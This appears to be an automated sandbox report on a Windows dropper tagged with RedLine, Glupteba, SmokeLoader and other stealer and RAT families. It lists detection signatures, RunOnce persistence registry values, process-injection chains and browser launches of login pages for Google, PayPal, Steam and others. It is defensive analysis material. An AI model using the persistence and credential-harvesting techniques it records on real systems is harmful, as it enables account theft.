Malware Analysis Report

2024-12-08 00:56

Sample ID 231111-nrp9qafe37
Target 71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371
SHA256 71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371
Tags
glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Analysis Overview

Threat Level: Known bad

The file 71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371 was found to be: Known bad.

Malicious Activity Summary

ZGRat

Glupteba payload

Glupteba

Detect Mystic stealer payload

Detect ZGRat V1

RedLine

SmokeLoader

RedLine payload

SectopRAT

SectopRAT payload

Mystic

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Analysis: static1

Detonation Overview

Reported

2023-11-11 11:38

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 11:38

Reported

2023-11-11 11:40

Platform

win10v2004-20231023-en

Max time kernel

97s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe"

Signatures

Detect Mystic stealer payload

Detect ZGRat V1

Glupteba

loader dropper glupteba

Glupteba payload

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

SectopRAT

trojan rat sectoprat

SectopRAT payload

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DA7F.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B169.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B169.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe N/A

AutoIT Executable

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\Conhost.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\Conhost.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B283.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DD10.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DF91.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe
PID 2156 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe
PID 2156 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe
PID 1408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe
PID 1408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe
PID 1408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe
PID 1352 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe
PID 1352 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe
PID 1352 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe
PID 4992 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe
PID 4992 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe
PID 4992 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe
PID 3868 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2888 wrote to memory of 4972 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2888 wrote to memory of 4972 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 2360 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 2360 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3672 wrote to memory of 4492 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3672 wrote to memory of 4492 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2304 wrote to memory of 4604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2304 wrote to memory of 4604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2576 wrote to memory of 2904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2576 wrote to memory of 2904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3336 wrote to memory of 2000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3336 wrote to memory of 2000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3940 wrote to memory of 4220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3940 wrote to memory of 4220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4472 wrote to memory of 2264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4472 wrote to memory of 2264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2556 wrote to memory of 464 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2556 wrote to memory of 464 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4384 wrote to memory of 2100 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4384 wrote to memory of 2100 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4992 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe
PID 4992 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe
PID 4992 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe

"C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x104,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

